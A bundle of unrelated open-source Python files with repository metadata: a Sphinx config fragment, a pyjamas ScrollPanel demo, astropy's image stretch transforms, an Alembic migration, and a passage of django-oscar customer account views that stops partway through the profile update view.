# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'arcade_tutorial', 'arcade_tutorial Documentation',
     [author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'arcade_tutorial', 'arcade_tutorial Documentation',
     author, 'arcade_tutorial', 'One line description of project.',
     'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
{
"content_hash": "978774d31cd4dae6e8a11afba43ab9e9",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 78,
"avg_line_length": 32.38345864661654,
"alnum_prop": 0.6665892732760622,
"repo_name": "pauleveritt/arcade_tutorial",
"id": "6212adb741646b5093cf7057a8beeeb18393cf39",
"size": "5067",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
"""
The ``ui.ScrollPanel`` class implements a panel that scrolls its contents.
If you want the scroll bars to be always visible, call
``setAlwaysShowScrollBars(True)``. You can also change the current scrolling
position programmatically by calling ``setScrollPosition(vPos)`` and
``setScrollHorizontalPosition(hPos)`` to change the horizontal and vertical
scrolling position, respectively.
"""
from pyjamas.ui.SimplePanel import SimplePanel
from pyjamas.ui.ScrollPanel import ScrollPanel
from pyjamas.ui.HTML import HTML
class ScrollPanelDemo(SimplePanel):
    """Showcase demo: a fixed-size ScrollPanel wrapping a passage of HTML."""

    def __init__(self):
        SimplePanel.__init__(self)
        # Adjacent string literals are concatenated at compile time, giving
        # exactly the same HTML payload as explicit '+' concatenation.
        passage = HTML("<b>Tao Te Ching, Chapter One</b><p>"
                       "The Way that can be told of is not an unvarying "
                       "way;<p>The names that can be named are not "
                       "unvarying names.<p>It was from the Nameless that "
                       "Heaven and Earth sprang;<p>The named is but the "
                       "mother that rears the ten thousand creatures, "
                       "each after its kind.")
        scroller = ScrollPanel()
        scroller.add(passage)
        scroller.setSize("300px", "100px")
        self.add(scroller)
|
{
"content_hash": "7dbe4596045db8e009cdd4a32fa9b596",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 77,
"avg_line_length": 39.87096774193548,
"alnum_prop": 0.633495145631068,
"repo_name": "certik/pyjamas",
"id": "59cbda85b0e68f2f2641823d2b584e6d661b3c0c",
"size": "1236",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "examples/showcase/src/demos_panels/scrollPanel.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "401884"
},
{
"name": "PHP",
"bytes": "121841"
},
{
"name": "Python",
"bytes": "4074658"
},
{
"name": "Shell",
"bytes": "14552"
}
],
"symlink_target": ""
}
|
"""
Classes that deal with stretching, i.e. mapping a range of [0:1] values onto
another set of [0:1] values with a transformation
"""
import numpy as np
from .transform import BaseTransform
from .transform import CompositeTransform
__all__ = ["BaseStretch", "LinearStretch", "SqrtStretch", "PowerStretch",
"PowerDistStretch", "SquaredStretch", "LogStretch", "AsinhStretch",
"SinhStretch", "HistEqStretch", "ContrastBiasStretch",
"CompositeStretch"]
def _logn(n, x, out=None):
"""Calculate the log base n of x."""
# We define this because numpy.lib.scimath.logn doesn't support out=
if out is None:
return np.log(x) / np.log(n)
else:
np.log(x, out=out)
np.true_divide(out, np.log(n), out=out)
return out
def _prepare(values, clip=True, out=None):
"""
Prepare the data by optionally clipping and copying, and return the
array that should be subsequently used for in-place calculations.
"""
if clip:
return np.clip(values, 0., 1., out=out)
else:
if out is None:
return np.array(values, copy=True)
else:
out[:] = np.asarray(values)
return out
class BaseStretch(BaseTransform):
    """
    Base class for the stretch classes, which, when called with an array
    of values in the range [0:1], return a transformed array of values,
    also in the range [0:1].
    """
    @property
    def _supports_invalid_kw(self):
        # Subclasses that accept an ``invalid=`` keyword in __call__
        # override this to return True.
        return False
    def __add__(self, other):
        # ``other`` runs first, then self (composition order is right-to-left).
        return CompositeStretch(other, self)
    def __call__(self, values, clip=True, out=None):
        """
        Transform values using this stretch.

        Parameters
        ----------
        values : array_like
            The input values, which should already be normalized to the
            [0:1] range.
        clip : bool, optional
            If `True` (default), values outside the [0:1] range are
            clipped to the [0:1] range.
        out : `~numpy.ndarray`, optional
            If specified, the output values will be placed in this array
            (typically used for in-place calculations).

        Returns
        -------
        result : `~numpy.ndarray`
            The transformed values.
        """
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
class LinearStretch(BaseStretch):
    r"""
    A linear stretch with a slope and offset.

    The stretch is given by:

    .. math::
        y = slope x + intercept

    Parameters
    ----------
    slope : float, optional
        Multiplicative factor applied to the input. Default is 1.
    intercept : float, optional
        Additive offset applied after scaling. Default is 0.
    """
    def __init__(self, slope=1, intercept=0):
        super().__init__()
        self.slope = slope
        self.intercept = intercept
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # Skip identity operations to avoid needless array passes.
        if self.slope != 1:
            np.multiply(result, self.slope, out=result)
        if self.intercept != 0:
            np.add(result, self.intercept, out=result)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        # Invert y = m*x + b analytically: x = y/m - b/m.
        return LinearStretch(1. / self.slope, -self.intercept / self.slope)
class SqrtStretch(BaseStretch):
    r"""
    A square root stretch.

    The stretch is given by:

    .. math::
        y = \sqrt{x}
    """
    @property
    def _supports_invalid_kw(self):
        return True
    def __call__(self, values, clip=True, out=None, invalid=None):
        """
        Transform values using this stretch.

        Parameters
        ----------
        values : array_like
            The input values, which should already be normalized to the
            [0:1] range.
        clip : bool, optional
            If `True` (default), values outside the [0:1] range are
            clipped to the [0:1] range.
        out : `~numpy.ndarray`, optional
            If specified, the output values will be placed in this array
            (typically used for in-place calculations).
        invalid : `None` or float, optional
            Value to assign NaN values generated by this class.  NaNs in
            the input ``values`` array are not changed.  Generally used
            with matplotlib normalization classes, where the value should
            map to the colormap "under" value (any finite value < 0).
            Ignored when `None` or when ``clip=True``.

        Returns
        -------
        result : `~numpy.ndarray`
            The transformed values.
        """
        result = _prepare(values, clip=clip, out=out)
        # sqrt of a negative input yields NaN; record where those inputs
        # are so only the NaNs created here get replaced (not NaNs that
        # were already present in the input).
        handle_invalid = invalid is not None and not clip
        with np.errstate(invalid='ignore'):
            if handle_invalid:
                bad = result < 0
            np.sqrt(result, out=result)
        if handle_invalid:
            result[bad] = invalid
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return PowerStretch(2)
class PowerStretch(BaseStretch):
    r"""
    A power stretch.

    The stretch is given by:

    .. math::
        y = x^a

    Parameters
    ----------
    a : float
        The power index (see the above formula). ``a`` must be greater
        than 0.
    """
    @property
    def _supports_invalid_kw(self):
        return True
    def __init__(self, a):
        super().__init__()
        if a <= 0:
            raise ValueError("a must be > 0")
        self.power = a
    def __call__(self, values, clip=True, out=None, invalid=None):
        """
        Transform values using this stretch.

        Parameters
        ----------
        values : array_like
            The input values, which should already be normalized to the
            [0:1] range.
        clip : bool, optional
            If `True` (default), values outside the [0:1] range are
            clipped to the [0:1] range.
        out : `~numpy.ndarray`, optional
            If specified, the output values will be placed in this array
            (typically used for in-place calculations).
        invalid : `None` or float, optional
            Value to assign NaN values generated by this class.  NaNs in
            the input ``values`` array are not changed.  Generally used
            with matplotlib normalization classes, where the value should
            map to the colormap "under" value (any finite value < 0).
            Ignored when `None` or when ``clip=True``.

        Returns
        -------
        result : `~numpy.ndarray`
            The transformed values.
        """
        result = _prepare(values, clip=clip, out=out)
        # Negative inputs produce NaN under fractional exponents;
        # replacement is limited to exponents in (-1, 0) or (0, 1),
        # mirroring the cases this class handles.
        handle_invalid = (invalid is not None and not clip
                          and ((-1 < self.power < 0)
                               or (0 < self.power < 1)))
        with np.errstate(invalid='ignore'):
            if handle_invalid:
                bad = result < 0
            np.power(result, self.power, out=result)
        if handle_invalid:
            # Replace only NaNs created here, not NaNs from the input.
            result[bad] = invalid
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return PowerStretch(1. / self.power)
class PowerDistStretch(BaseStretch):
    r"""
    An alternative power stretch.

    The stretch is given by:

    .. math::
        y = \frac{a^x - 1}{a - 1}

    Parameters
    ----------
    a : float, optional
        The ``a`` parameter used in the above formula. ``a`` must be
        greater than or equal to 0, but cannot be set to 1. Default is
        1000.
    """
    def __init__(self, a=1000.0):
        # a == 1 would make the (a - 1) denominator vanish.
        if a < 0 or a == 1:
            raise ValueError("a must be >= 0, but cannot be set to 1")
        super().__init__()
        self.exp = a
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # Evaluate (a**x - 1) / (a - 1) entirely in place.
        np.power(self.exp, result, out=result)
        np.subtract(result, 1, out=result)
        np.true_divide(result, self.exp - 1.0, out=result)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return InvertedPowerDistStretch(a=self.exp)
class InvertedPowerDistStretch(BaseStretch):
    r"""
    Inverse transformation for `PowerDistStretch`.

    The stretch is given by:

    .. math::
        y = \frac{\log(x (a-1) + 1)}{\log a}

    Parameters
    ----------
    a : float, optional
        The ``a`` parameter used in the above formula. ``a`` must be
        greater than or equal to 0, but cannot be set to 1. Default is
        1000.
    """
    def __init__(self, a=1000.0):
        # a == 1 is a singularity of the forward transform as well.
        if a < 0 or a == 1:
            raise ValueError("a must be >= 0, but cannot be set to 1")
        super().__init__()
        self.exp = a
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # Evaluate log_a(x * (a - 1) + 1) entirely in place.
        np.multiply(result, self.exp - 1.0, out=result)
        np.add(result, 1, out=result)
        _logn(self.exp, result, out=result)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return PowerDistStretch(a=self.exp)
class SquaredStretch(PowerStretch):
    r"""
    A convenience class for a power stretch of 2.

    The stretch is given by:

    .. math::
        y = x^2
    """
    def __init__(self):
        # Fixed exponent of 2; PowerStretch handles the evaluation.
        super().__init__(2)
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return SqrtStretch()
class LogStretch(BaseStretch):
    r"""
    A log stretch.

    The stretch is given by:

    .. math::
        y = \frac{\log{(a x + 1)}}{\log{(a + 1)}}

    Parameters
    ----------
    a : float
        The ``a`` parameter used in the above formula. ``a`` must be
        greater than 0. Default is 1000.
    """
    @property
    def _supports_invalid_kw(self):
        return True
    def __init__(self, a=1000.0):
        super().__init__()
        # a <= 0 would make log(a + 1) non-positive or undefined.
        if a <= 0:
            raise ValueError("a must be > 0")
        self.exp = a
    def __call__(self, values, clip=True, out=None, invalid=None):
        """
        Transform values using this stretch.

        Parameters
        ----------
        values : array_like
            The input values, which should already be normalized to the
            [0:1] range.
        clip : bool, optional
            If `True` (default), values outside the [0:1] range are
            clipped to the [0:1] range.
        out : `~numpy.ndarray`, optional
            If specified, the output values will be placed in this array
            (typically used for in-place calculations).
        invalid : `None` or float, optional
            Value to assign NaN values generated by this class.  NaNs in
            the input ``values`` array are not changed.  Generally used
            with matplotlib normalization classes, where the value should
            map to the colormap "under" value (any finite value < 0).
            Ignored when `None` or when ``clip=True``.

        Returns
        -------
        result : `~numpy.ndarray`
            The transformed values.
        """
        result = _prepare(values, clip=clip, out=out)
        # Record which inputs were negative; their results are
        # overwritten with ``invalid`` afterwards (only when not
        # clipping and an invalid value was supplied).
        handle_invalid = invalid is not None and not clip
        with np.errstate(invalid='ignore'):
            if handle_invalid:
                bad = result < 0
            np.multiply(result, self.exp, out=result)
            np.add(result, 1., out=result)
            np.log(result, out=result)
            np.true_divide(result, np.log(self.exp + 1.), out=result)
        if handle_invalid:
            result[bad] = invalid
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return InvertedLogStretch(self.exp)
class InvertedLogStretch(BaseStretch):
    r"""
    Inverse transformation for `LogStretch`.

    The stretch is given by:

    .. math::
        y = \frac{e^{x \log{(a + 1)}} - 1}{a}

    Parameters
    ----------
    a : float
        The ``a`` parameter used in the above formula. ``a`` must be
        greater than 0.
    """
    def __init__(self, a):
        super().__init__()
        # a <= 0 is a singularity of the forward transform as well.
        if a <= 0:
            raise ValueError("a must be > 0")
        self.exp = a
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # Evaluate (exp(x * log(a + 1)) - 1) / a entirely in place.
        np.multiply(result, np.log(self.exp + 1.), out=result)
        np.exp(result, out=result)
        np.subtract(result, 1., out=result)
        np.true_divide(result, self.exp, out=result)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return LogStretch(self.exp)
class AsinhStretch(BaseStretch):
    r"""
    An asinh stretch.

    The stretch is given by:

    .. math::
        y = \frac{{\rm asinh}(x / a)}{{\rm asinh}(1 / a)}.

    Parameters
    ----------
    a : float, optional
        The ``a`` parameter used in the above formula.  This is the
        point where the asinh curve transitions from linear to
        logarithmic behavior, expressed as a fraction of the normalized
        image.  ``a`` must satisfy 0 < a <= 1.  Default is 0.1.
    """
    def __init__(self, a=0.1):
        super().__init__()
        if a <= 0 or a > 1:
            raise ValueError("a must be > 0 and <= 1")
        self.a = a
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # asinh(x / a), normalized so that x == 1 maps to y == 1.
        np.true_divide(result, self.a, out=result)
        np.arcsinh(result, out=result)
        np.true_divide(result, np.arcsinh(1. / self.a), out=result)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return SinhStretch(a=1. / np.arcsinh(1. / self.a))
class SinhStretch(BaseStretch):
    r"""
    A sinh stretch.

    The stretch is given by:

    .. math::
        y = \frac{{\rm sinh}(x / a)}{{\rm sinh}(1 / a)}

    Parameters
    ----------
    a : float, optional
        The ``a`` parameter used in the above formula.  ``a`` must
        satisfy 0 < a <= 1.  Default is 1/3.
    """
    def __init__(self, a=1./3.):
        super().__init__()
        if a <= 0 or a > 1:
            raise ValueError("a must be > 0 and <= 1")
        self.a = a
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # sinh(x / a), normalized so that x == 1 maps to y == 1.
        np.true_divide(result, self.a, out=result)
        np.sinh(result, out=result)
        np.true_divide(result, np.sinh(1. / self.a), out=result)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return AsinhStretch(a=1. / np.sinh(1. / self.a))
class HistEqStretch(BaseStretch):
    """
    A histogram equalization stretch.

    Parameters
    ----------
    data : array_like
        The data defining the equalization.
    values : array_like, optional
        The input image values, which should already be normalized to
        the [0:1] range.
    """
    def __init__(self, data, values=None):
        # The reference data is not assumed to be normalized: sort it,
        # drop non-finite entries, then rescale onto [0, 1].
        reference = np.sort(data.ravel())
        reference = reference[np.isfinite(reference)]
        vmin, vmax = reference.min(), reference.max()
        self.data = (reference - vmin) / (vmax - vmin)
        # Relative (cumulative) position of each reference pixel.
        if values is None:
            self.values = np.linspace(0., 1., len(self.data))
        else:
            self.values = values
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # Map each input onto its equalized position via interpolation.
        result[:] = np.interp(result, self.data, self.values)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return InvertedHistEqStretch(self.data, values=self.values)
class InvertedHistEqStretch(BaseStretch):
    """
    Inverse transformation for `HistEqStretch`.

    Parameters
    ----------
    data : array_like
        The data defining the equalization.
    values : array_like, optional
        The input image values, which should already be normalized to
        the [0:1] range.
    """
    def __init__(self, data, values=None):
        self.data = data[np.isfinite(data)]
        if values is None:
            self.values = np.linspace(0., 1., len(self.data))
        else:
            self.values = values
    def __call__(self, values, clip=True, out=None):
        result = _prepare(values, clip=clip, out=out)
        # Same interpolation as HistEqStretch with x and y swapped.
        result[:] = np.interp(result, self.values, self.data)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return HistEqStretch(self.data, values=self.values)
class ContrastBiasStretch(BaseStretch):
    r"""
    A stretch that takes into account contrast and bias.

    The stretch is given by:

    .. math::
        y = (x - {\rm bias}) * {\rm contrast} + 0.5

    and the output values are clipped to the [0:1] range.

    Parameters
    ----------
    contrast : float
        The contrast parameter (see the above formula).
    bias : float
        The bias parameter (see the above formula).
    """
    def __init__(self, contrast, bias):
        super().__init__()
        self.contrast = contrast
        self.bias = bias
    def __call__(self, values, clip=True, out=None):
        # Clipping is deferred until after the transformation because
        # this stretch does not map [0:1] onto [0:1].
        result = _prepare(values, clip=False, out=out)
        np.subtract(result, self.bias, out=result)
        np.multiply(result, self.contrast, out=result)
        np.add(result, 0.5, out=result)
        if clip:
            np.clip(result, 0, 1, out=result)
        return result
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return InvertedContrastBiasStretch(self.contrast, self.bias)
class InvertedContrastBiasStretch(BaseStretch):
    """
    Inverse transformation for `ContrastBiasStretch`.

    Parameters
    ----------
    contrast : float
        The contrast parameter (see `ContrastBiasStretch`).
    bias : float
        The bias parameter (see `ContrastBiasStretch`).
    """
    def __init__(self, contrast, bias):
        super().__init__()
        self.contrast = contrast
        self.bias = bias
    def __call__(self, values, clip=True, out=None):
        # As a special case here, we only clip *after* the
        # transformation since it does not map [0:1] to [0:1]
        values = _prepare(values, clip=False, out=out)
        np.subtract(values, 0.5, out=values)
        np.true_divide(values, self.contrast, out=values)
        np.add(values, self.bias, out=values)
        if clip:
            np.clip(values, 0, 1, out=values)
        return values
    @property
    def inverse(self):
        """A stretch object that performs the inverse operation."""
        return ContrastBiasStretch(self.contrast, self.bias)
class CompositeStretch(CompositeTransform, BaseStretch):
    """
    A combination of two stretches.

    Parameters
    ----------
    stretch_1 : :class:`astropy.visualization.BaseStretch`
        The first stretch to apply.
    stretch_2 : :class:`astropy.visualization.BaseStretch`
        The second stretch to apply.
    """
    def __call__(self, values, clip=True, out=None):
        # transform_1/transform_2 are stored by CompositeTransform's
        # constructor; apply them in order, reusing ``out`` both times.
        return self.transform_2(
            self.transform_1(values, clip=clip, out=out), clip=clip, out=out)
|
{
"content_hash": "44db8c1070dd5316b3a6a42f4b9a1289",
"timestamp": "",
"source": "github",
"line_count": 713,
"max_line_length": 78,
"avg_line_length": 29.65638148667602,
"alnum_prop": 0.5745093402695672,
"repo_name": "dhomeier/astropy",
"id": "419868c759262e623017be19037dc8efaf94685a",
"size": "21210",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "astropy/visualization/stretch.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "10891881"
},
{
"name": "C++",
"bytes": "55147"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Lex",
"bytes": "181654"
},
{
"name": "M4",
"bytes": "18016"
},
{
"name": "Makefile",
"bytes": "51059"
},
{
"name": "Python",
"bytes": "10582251"
},
{
"name": "Shell",
"bytes": "17024"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
}
|
"""empty message
Revision ID: 4249ec1222e4
Revises: 481d4a3fef63
Create Date: 2014-08-14 22:02:40.703605
"""
# revision identifiers, used by Alembic.
revision = '4249ec1222e4'  # this migration's unique ID
down_revision = '481d4a3fef63'  # the migration this one builds on
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Apply this migration: create the ``user_info`` table."""
    # Auto-generated by Alembic - adjust as needed.
    op.create_table(
        'user_info',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('email', sa.String(length=255), nullable=True),
        sa.Column('password', sa.String(length=255), nullable=True),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('date_created', sa.DateTime(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
def downgrade():
    """Revert this migration: drop the ``user_info`` table."""
    # Auto-generated by Alembic - adjust as needed.
    op.drop_table('user_info')
|
{
"content_hash": "72779a8a2fe80c2ee5cf34bf071d58fc",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 64,
"avg_line_length": 27.03030303030303,
"alnum_prop": 0.6782511210762332,
"repo_name": "kho0810/flaskr",
"id": "32f6d108e214afbc0e24845ceb2162279ec4dd1e",
"size": "892",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/4249ec1222e4_.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "6327"
},
{
"name": "JavaScript",
"bytes": "11606"
},
{
"name": "PHP",
"bytes": "76"
},
{
"name": "Python",
"bytes": "7636567"
}
],
"symlink_target": ""
}
|
from django import http
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import login as auth_login
from django.contrib.auth import logout as auth_logout
from django.contrib.auth import update_session_auth_hash
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse, reverse_lazy
from django.shortcuts import get_object_or_404, redirect
from django.utils.translation import ugettext_lazy as _
from django.views import generic
from oscar.apps.customer.utils import get_password_reset_url
from oscar.core.compat import get_user_model
from oscar.core.loading import (
get_class, get_classes, get_model, get_profile_class)
from oscar.core.utils import safe_referrer
from oscar.views.generic import PostActionMixin
from . import signals
PageTitleMixin, RegisterUserMixin = get_classes(
'customer.mixins', ['PageTitleMixin', 'RegisterUserMixin'])
Dispatcher = get_class('customer.utils', 'Dispatcher')
EmailAuthenticationForm, EmailUserCreationForm, OrderSearchForm = get_classes(
'customer.forms', ['EmailAuthenticationForm', 'EmailUserCreationForm',
'OrderSearchForm'])
PasswordChangeForm = get_class('customer.forms', 'PasswordChangeForm')
ProfileForm, ConfirmPasswordForm = get_classes(
'customer.forms', ['ProfileForm', 'ConfirmPasswordForm'])
UserAddressForm = get_class('address.forms', 'UserAddressForm')
Order = get_model('order', 'Order')
Line = get_model('basket', 'Line')
Basket = get_model('basket', 'Basket')
UserAddress = get_model('address', 'UserAddress')
Email = get_model('customer', 'Email')
ProductAlert = get_model('customer', 'ProductAlert')
CommunicationEventType = get_model('customer', 'CommunicationEventType')
User = get_user_model()
# =======
# Account
# =======
class AccountSummaryView(generic.RedirectView):
    """
    View that exists for legacy reasons and customisability. It commonly gets
    called when the user clicks on "Account" in the navbar.

    Oscar defaults to just redirecting to the profile summary page (and
    that redirect can be configured via OSCAR_ACCOUNT_REDIRECT_URL), but
    it's also likely you want to display an 'account overview' page or
    such like. The presence of this view allows just that, without
    having to change a lot of templates.
    """
    # Target URL pattern comes from settings so projects can repoint it.
    pattern_name = settings.OSCAR_ACCOUNTS_REDIRECT_URL
    # Temporary (302) redirect so the target can change without clients
    # caching the old location.
    permanent = False
class AccountRegistrationView(RegisterUserMixin, generic.FormView):
    """
    Stand-alone registration page.

    Already-authenticated users are redirected straight to
    ``LOGIN_REDIRECT_URL``; on success the new user is sent to the URL
    carried in the ``next`` query parameter (validated by the form).
    """
    form_class = EmailUserCreationForm
    template_name = 'customer/registration.html'
    redirect_field_name = 'next'
    def get(self, request, *args, **kwargs):
        # No point showing the registration form to a logged-in user.
        if request.user.is_authenticated():
            return redirect(settings.LOGIN_REDIRECT_URL)
        return super(AccountRegistrationView, self).get(
            request, *args, **kwargs)
    def get_logged_in_redirect(self):
        return reverse('customer:summary')
    def get_form_kwargs(self):
        form_kwargs = super(AccountRegistrationView, self).get_form_kwargs()
        # Pre-fill the email field and carry the post-registration
        # redirect through the form round-trip.
        form_kwargs['initial'] = {
            'email': self.request.GET.get('email', ''),
            'redirect_url': self.request.GET.get(self.redirect_field_name, '')
        }
        form_kwargs['host'] = self.request.get_host()
        return form_kwargs
    def get_context_data(self, *args, **kwargs):
        context = super(AccountRegistrationView, self).get_context_data(
            *args, **kwargs)
        context['cancel_url'] = safe_referrer(self.request, '')
        return context
    def form_valid(self, form):
        self.register_user(form)
        return redirect(form.cleaned_data['redirect_url'])
class AccountAuthView(RegisterUserMixin, generic.TemplateView):
    """
    This is actually a slightly odd double form view that allows a customer to
    either login or register.

    Both forms are rendered on one template; the POST handler decides
    which one to validate based on the submit button's name.
    """
    template_name = 'customer/login_registration.html'
    # Form prefixes keep the two forms' field names distinct in the POST.
    login_prefix, registration_prefix = 'login', 'registration'
    login_form_class = EmailAuthenticationForm
    registration_form_class = EmailUserCreationForm
    redirect_field_name = 'next'
    def get(self, request, *args, **kwargs):
        # Already logged in - skip straight to the post-login page.
        if request.user.is_authenticated():
            return redirect(settings.LOGIN_REDIRECT_URL)
        return super(AccountAuthView, self).get(
            request, *args, **kwargs)
    def get_context_data(self, *args, **kwargs):
        ctx = super(AccountAuthView, self).get_context_data(*args, **kwargs)
        # Only build fresh (unbound) forms when a bound one wasn't
        # passed in by a failed validation round-trip.
        if 'login_form' not in kwargs:
            ctx['login_form'] = self.get_login_form()
        if 'registration_form' not in kwargs:
            ctx['registration_form'] = self.get_registration_form()
        return ctx
    def post(self, request, *args, **kwargs):
        # Use the name of the submit button to determine which form to validate
        if u'login_submit' in request.POST:
            return self.validate_login_form()
        elif u'registration_submit' in request.POST:
            return self.validate_registration_form()
        return http.HttpResponseBadRequest()
    # LOGIN
    def get_login_form(self, bind_data=False):
        """Build the login form, optionally bound to the request data."""
        return self.login_form_class(
            **self.get_login_form_kwargs(bind_data))
    def get_login_form_kwargs(self, bind_data=False):
        kwargs = {}
        kwargs['host'] = self.request.get_host()
        kwargs['prefix'] = self.login_prefix
        kwargs['initial'] = {
            'redirect_url': self.request.GET.get(self.redirect_field_name, ''),
        }
        if bind_data and self.request.method in ('POST', 'PUT'):
            kwargs.update({
                'data': self.request.POST,
                'files': self.request.FILES,
            })
        return kwargs
    def validate_login_form(self):
        """Validate the login form and log the user in on success."""
        form = self.get_login_form(bind_data=True)
        if form.is_valid():
            user = form.get_user()
            # Grab a reference to the session ID before logging in
            old_session_key = self.request.session.session_key
            auth_login(self.request, form.get_user())
            # Raise signal robustly (we don't want exceptions to crash the
            # request handling). We use a custom signal as we want to track the
            # session key before calling login (which cycles the session ID).
            signals.user_logged_in.send_robust(
                sender=self, request=self.request, user=user,
                old_session_key=old_session_key)
            msg = self.get_login_success_message(form)
            if msg:
                messages.success(self.request, msg)
            return redirect(self.get_login_success_url(form))
        # Invalid credentials - re-render with the bound (errored) form.
        ctx = self.get_context_data(login_form=form)
        return self.render_to_response(ctx)
    def get_login_success_message(self, form):
        return _("Welcome back")
    def get_login_success_url(self, form):
        redirect_url = form.cleaned_data['redirect_url']
        if redirect_url:
            return redirect_url
        # Redirect staff members to dashboard as that's the most likely place
        # they'll want to visit if they're logging in.
        if self.request.user.is_staff:
            return reverse('dashboard:index')
        return settings.LOGIN_REDIRECT_URL
    # REGISTRATION
    def get_registration_form(self, bind_data=False):
        """Build the registration form, optionally bound to request data."""
        return self.registration_form_class(
            **self.get_registration_form_kwargs(bind_data))
    def get_registration_form_kwargs(self, bind_data=False):
        kwargs = {}
        kwargs['host'] = self.request.get_host()
        kwargs['prefix'] = self.registration_prefix
        kwargs['initial'] = {
            'redirect_url': self.request.GET.get(self.redirect_field_name, ''),
        }
        if bind_data and self.request.method in ('POST', 'PUT'):
            kwargs.update({
                'data': self.request.POST,
                'files': self.request.FILES,
            })
        return kwargs
    def validate_registration_form(self):
        """Validate the registration form and create the user on success."""
        form = self.get_registration_form(bind_data=True)
        if form.is_valid():
            self.register_user(form)
            msg = self.get_registration_success_message(form)
            messages.success(self.request, msg)
            return redirect(self.get_registration_success_url(form))
        # Invalid submission - re-render with the bound (errored) form.
        ctx = self.get_context_data(registration_form=form)
        return self.render_to_response(ctx)
    def get_registration_success_message(self, form):
        return _("Thanks for registering!")
    def get_registration_success_url(self, form):
        redirect_url = form.cleaned_data['redirect_url']
        if redirect_url:
            return redirect_url
        return settings.LOGIN_REDIRECT_URL
class LogoutView(generic.RedirectView):
    """Log the user out, scrub configured cookies, then redirect home."""
    url = settings.OSCAR_HOMEPAGE
    permanent = False
    def get(self, request, *args, **kwargs):
        auth_logout(request)
        response = super(LogoutView, self).get(request, *args, **kwargs)
        # Delete any cookies configured to be cleared at logout.
        for cookie_name in settings.OSCAR_COOKIES_DELETE_ON_LOGOUT:
            response.delete_cookie(cookie_name)
        return response
# =============
# Profile
# =============
class ProfileView(PageTitleMixin, generic.TemplateView):
    """Read-only summary page of the user's profile fields."""
    template_name = 'customer/profile/profile.html'
    page_title = _('Profile')
    active_tab = 'profile'
    def get_context_data(self, **kwargs):
        context = super(ProfileView, self).get_context_data(**kwargs)
        context['profile_fields'] = self.get_profile_fields(self.request.user)
        return context
    def get_profile_fields(self, user):
        """Collect display data for custom-user and profile-class fields."""
        field_data = []
        # Fields declared on a custom user model.
        for field_name in User._meta.additional_fields:
            field_data.append(
                self.get_model_field_data(user, field_name))
        # Fields from a separate profile class, if one is configured.
        profile_class = get_profile_class()
        if profile_class:
            try:
                profile = profile_class.objects.get(user=user)
            except ObjectDoesNotExist:
                # No saved profile yet - use an unsaved instance so that
                # defaults are still displayed.
                profile = profile_class(user=user)
            for field in profile._meta.local_fields:
                if field.name in ('user', 'id'):
                    continue
                field_data.append(
                    self.get_model_field_data(profile, field.name))
        return field_data
    def get_model_field_data(self, model_class, field_name):
        """
        Extract the verbose name and value for a model's field value
        """
        field = model_class._meta.get_field(field_name)
        if field.choices:
            # Use the human-readable label for choice fields.
            value = getattr(model_class, 'get_%s_display' % field_name)()
        else:
            value = getattr(model_class, field_name)
        return {
            'name': getattr(field, 'verbose_name'),
            'value': value,
        }
class ProfileUpdateView(PageTitleMixin, generic.FormView):
    """
    Edit the user's profile; when the email address changes, a warning
    email (with a password-reset link) is sent to the *old* address.
    """
    form_class = ProfileForm
